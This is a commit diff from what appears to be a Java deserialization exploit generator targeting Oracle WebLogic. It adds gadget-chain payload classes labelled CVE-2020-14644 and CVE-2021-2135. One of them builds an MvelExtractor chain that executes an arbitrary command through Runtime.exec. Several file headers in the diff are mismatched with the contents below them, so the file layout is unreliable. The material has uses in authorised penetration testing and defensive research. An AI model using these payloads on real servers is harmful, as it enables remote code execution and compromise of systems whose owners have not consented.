add some gadgets

Author: cckuailong

libs/eclipselink.jar

@@ -282,6 +282,16 @@
             <artifactId>coherence-web</artifactId>
             <version>12.2.1</version>
         </dependency>
+        <dependency>
+            <groupId>weblogic</groupId>
+            <artifactId>eclipselink</artifactId>
+            <version>12.2.1</version>
+        </dependency>
+        <dependency>
+            <groupId>weblogic</groupId>
+            <artifactId>toplink-grid</artifactId>
+            <version>12.2.1</version>
+        </dependency>
 
         <!-- test -->
         <dependency>
@@ -436,6 +446,38 @@
                             <goal>install-file</goal>
                         </goals>
                     </execution>
+                    <execution>
+                        <id>install-eclipselink</id>
+                        <phase>clean</phase>
+                        <configuration>
+                            <file>${basedir}/libs/eclipselink.jar</file>
+                            <repositoryLayout>default</repositoryLayout>
+                            <groupId>weblogic</groupId>
+                            <artifactId>eclipselink</artifactId>
+                            <version>12.2.1</version>
+                            <packaging>jar</packaging>
+                            <generatePom>true</generatePom>
+                        </configuration>
+                        <goals>
+                            <goal>install-file</goal>
+                        </goals>
+                    </execution>
+                    <execution>
+                        <id>install-toplink-grid</id>
+                        <phase>clean</phase>
+                        <configuration>
+                            <file>${basedir}/libs/toplink-grid.jar</file>
+                            <repositoryLayout>default</repositoryLayout>
+                            <groupId>weblogic</groupId>
+                            <artifactId>toplink-grid</artifactId>
+                            <version>12.2.1</version>
+                            <packaging>jar</packaging>
+                            <generatePom>true</generatePom>
+                        </configuration>
+                        <goals>
+                            <goal>install-file</goal>
+                        </goals>
+                    </execution>
                 </executions>
             </plugin>
         </plugins>

libs/toplink-grid.jar

@@ -0,0 +1,24 @@
+#!/bin/bash
+
+if [ $# -lt 1 ]; then
+    echo "Usage: $0 name [path ...]";
+    exit 2;
+fi
+
+name=${1//./\/};
+shift;
+path=${@:-.};
+
+function check-jar() {
+    jar -tf "$1" | grep -iH --label "$1" "$name";
+}
+
+status=1;
+
+while read -r -d '' jarfile; do
+    check-jar "$jarfile" && status=0;
+done < <(find $path -type f -name '*.jar' -size +22c -print0)
+
+exit $status;
+
+# Usage: /bin/bash find-jar.sh "oracle.eclipselink.coherence.integrated.internal.cache.LockVersionExtractor"

pom.xml

@@ -6,9 +6,9 @@
 import java.io.OutputStream;
 import java.util.concurrent.Callable;
 
-public class Serializer implements Callable<byte[]> {
+public class Serializerable implements Callable<byte[]> {
 	private final Object object;
-	public Serializer(Object object) {
+	public Serializerable(Object object) {
 		this.object = object;
 	}
 

script/find-jar.sh

@@ -0,0 +1,42 @@
+package payloads;
+
+import clojure.lang.Obj;
+import com.tangosol.internal.util.invoke.ClassDefinition;
+import com.tangosol.internal.util.invoke.ClassIdentity;
+import com.tangosol.internal.util.invoke.RemoteConstructor;
+import com.tangosol.internal.util.invoke.lambda.LambdaIdentity;
+import common.Serializerable;
+import payloads.annotation.Authors;
+import payloads.annotation.Dependencies;
+import util.PayloadRunner;
+
+import java.io.InputStream;
+
+import static util.Transformers.insertCommand;
+
+
+// CVE-2020-14644 weblogic 12.2.1.3
+
+@Dependencies({"weblogic:12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0"})
+@Authors({ Authors.CCKUAILONG })
+public class Coherence5 extends PayloadRunner implements ObjectPayload<Object> {
+
+	public Object getObject(final String command) throws Exception {
+		InputStream in = Thread.currentThread().getContextClassLoader().getResourceAsStream("template/LambdaIdentity$E12ECA49F06D0401A9D406B2DCC7463A.class");
+		byte[] bytes = insertCommand(in, command);
+		RemoteConstructor constructor = new RemoteConstructor(
+				new ClassDefinition(new ClassIdentity(LambdaIdentity.class), bytes), new Object[]{}
+		);
+
+		return Serializerable.serialize(constructor);
+	}
+
+	public static byte[] getBytes(final String command) throws Exception {
+		return PayloadRunner.run(Coherence5.class, command);
+	}
+
+	public static void main(final String command) throws Exception {
+		PayloadRunner.run(Coherence5.class, command);
+	}
+
+}

src/main/java/common/Serializer.java src/main/java/common/Serializerable.javasrc/main/java/common/Serializer.java renamed to src/main/java/common/Serializerable.java

@@ -0,0 +1,41 @@
+package payloads;
+
+import com.tangosol.internal.util.invoke.ClassDefinition;
+import com.tangosol.internal.util.invoke.ClassIdentity;
+import com.tangosol.internal.util.invoke.RemoteConstructor;
+import com.tangosol.internal.util.invoke.lambda.LambdaIdentity;
+import common.Serializerable;
+import payloads.annotation.Authors;
+import payloads.annotation.Dependencies;
+import util.PayloadRunner;
+
+import java.io.InputStream;
+
+import static util.Transformers.insertCommand;
+
+
+// CVE-2020-14644 weblogic 12.2.1.4
+
+@Dependencies({"weblogic:12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0"})
+@Authors({ Authors.CCKUAILONG })
+public class Coherence6 extends PayloadRunner implements ObjectPayload<Object> {
+
+	public Object getObject(final String command) throws Exception {
+		InputStream in = Thread.currentThread().getContextClassLoader().getResourceAsStream("template/LambdaIdentity$423B02C050017B24DB10DFF759AA56BF.class");
+		byte[] bytes = insertCommand(in, command);
+		RemoteConstructor constructor = new RemoteConstructor(
+				new ClassDefinition(new ClassIdentity(LambdaIdentity.class), bytes), new Object[]{}
+		);
+
+		return Serializerable.serialize(constructor);
+	}
+
+	public static byte[] getBytes(final String command) throws Exception {
+		return PayloadRunner.run(Coherence6.class, command);
+	}
+
+	public static void main(final String command) throws Exception {
+		PayloadRunner.run(Coherence6.class, command);
+	}
+
+}

src/main/java/payloads/Coherence5.java

@@ -5,7 +5,7 @@
 import sun.rmi.transport.LiveRef;
 import sun.rmi.transport.tcp.TCPEndpoint;
 import weblogic.jms.common.StreamMessageImpl;
-import common.Serializer;
+import common.Serializerable;
 import payloads.annotation.Authors;
 import util.PayloadRunner;
 
@@ -45,7 +45,7 @@ public Object getObject (final String command ) throws Exception {
         UnicastRef unicastRef = new UnicastRef(new LiveRef(objID, tcpEndpoint, false));
         RemoteObjectInvocationHandler remoteObjectInvocationHandler = new RemoteObjectInvocationHandler(unicastRef);
         Object object = Proxy.newProxyInstance(JRMPClient2.class.getClassLoader(), new Class[] { Registry.class }, remoteObjectInvocationHandler);
-        return streamMessageImpl(Serializer.serialize(object));
+        return streamMessageImpl(Serializerable.serialize(object));
     }
 
 

src/main/java/payloads/Coherence6.java

@@ -1,6 +1,6 @@
 package payloads;
 
-import common.Serializer;
+import common.Serializerable;
 import org.apache.commons.collections.Transformer;
 import org.apache.commons.collections.functors.ChainedTransformer;
 import org.apache.commons.collections.functors.ConstantTransformer;
@@ -60,7 +60,7 @@ public Object getObject(final String command) throws Exception {
 
 		Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain
 
-		return streamMessageImpl(Serializer.serialize(handler));
+		return streamMessageImpl(Serializerable.serialize(handler));
 	}
 
 	public static byte[] getBytes(final String command) throws Exception {

src/main/java/payloads/JRMPClient4.java

@@ -0,0 +1,90 @@
+package payloads;
+
+import com.sun.org.apache.xpath.internal.objects.XString;
+import com.tangosol.coherence.rest.util.extractor.MvelExtractor;
+import com.tangosol.coherence.servlet.AttributeHolder;
+import com.tangosol.internal.util.SimpleBinaryEntry;
+import com.tangosol.io.DefaultSerializer;
+import com.tangosol.io.Serializer;
+import com.tangosol.util.*;
+import com.tangosol.util.aggregator.TopNAggregator;
+import com.tangosol.util.filter.MapEventFilter;
+import com.tangosol.util.processor.ConditionalPutAll;
+
+import java.io.ByteArrayOutputStream;
+import java.io.DataOutputStream;
+import java.lang.reflect.Field;
+import java.lang.reflect.Method;
+
+import common.Serializerable;
+import payloads.annotation.Authors;
+import payloads.annotation.Dependencies;
+import util.PayloadRunner;
+
+
+// CVE-2021-2135
+
+@SuppressWarnings({ "rawtypes", "unchecked" })
+@Dependencies({"weblogic:12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0"})
+@Authors({ Authors.CCKUAILONG })
+public class Weblogic10 implements ObjectPayload<Object> {
+
+	public byte[] getObject(final String command) throws Exception {
+		// 生成一个Name对象
+		MvelExtractor extractor1 = new MvelExtractor("java.lang.Runtime.getRuntime().exec(\""+ command +"\");return new Integer(1);");
+		MvelExtractor extractor2 = new MvelExtractor("");
+
+		// 序列化入口
+		AttributeHolder attributeHolder = new AttributeHolder();
+
+		SortedBag partialResult = new TopNAggregator.PartialResult(extractor2, 2);
+		partialResult.add(1);
+		filedSet("m_comparator",partialResult, extractor1);
+
+		// 这里bin_Key必须用ExternalizableHelper.writeObject赋值，不能用partialResult.writeExternal(dataOutputStream1);
+		// 因为使用partialResult.writeExternal最终不会调用partialResult.readExternal，只会写m_comparator，不写partialResult自身
+		ByteArrayOutputStream baos1 = new ByteArrayOutputStream();
+		DataOutputStream dataOutputStream1 = new DataOutputStream(baos1);
+		ExternalizableHelper.writeObject(dataOutputStream1, partialResult);
+
+		ByteArrayOutputStream baos2 = new ByteArrayOutputStream();
+		DataOutputStream dataOutputStream2 = new DataOutputStream(baos2);
+		ExternalizableHelper.writeObject(dataOutputStream2, new Integer(0));
+
+		Binary key = new Binary(baos1);
+		Binary value = new Binary(baos2);
+		SimpleBinaryEntry simpleBinaryEntry = new SimpleBinaryEntry(key,value);
+		Serializer m_serializer= new DefaultSerializer(SimpleBinaryEntry.class.getClassLoader());
+		simpleBinaryEntry.setContextSerializer(m_serializer);
+
+		// 调用xString.equals(simpleBinaryEntry)可触发SimpleBinaryEntry#toString，所以map按顺序先加入simpleBinaryEntry，再加入xString
+
+		LiteMap liteMap = new LiteMap();
+		liteMap.put(simpleBinaryEntry,1);
+		liteMap.put(new XString(null),2);
+		ConditionalPutAll conditionalPutAll = new ConditionalPutAll(new MapEventFilter(), liteMap);
+
+		// 序列化入口
+//        AttributeHolder attributeHolder = new AttributeHolder();
+		Method setInternalValue = attributeHolder.getClass().getDeclaredMethod("setInternalValue", Object.class);
+		setInternalValue.setAccessible(true);
+		setInternalValue.invoke(attributeHolder, conditionalPutAll); //调用setInternalValue方法设置m_oValue属性为conditionalPutAll
+
+		return Serializerable.serialize(attributeHolder);
+	}
+
+	private static void filedSet(String fieldName, Object target, Object fieldValue) throws NoSuchFieldException, IllegalAccessException {
+		Field field = target.getClass().getSuperclass().getDeclaredField(fieldName);
+		field.setAccessible(true);
+		field.set(target, fieldValue);
+	}
+
+	public static byte[] getBytes(final String command) throws Exception {
+		return Weblogic10.class.newInstance().getObject(command);
+	}
+
+	public static void main(final String command) throws Exception {
+		PayloadRunner.run(Weblogic10.class, command);
+	}
+
+}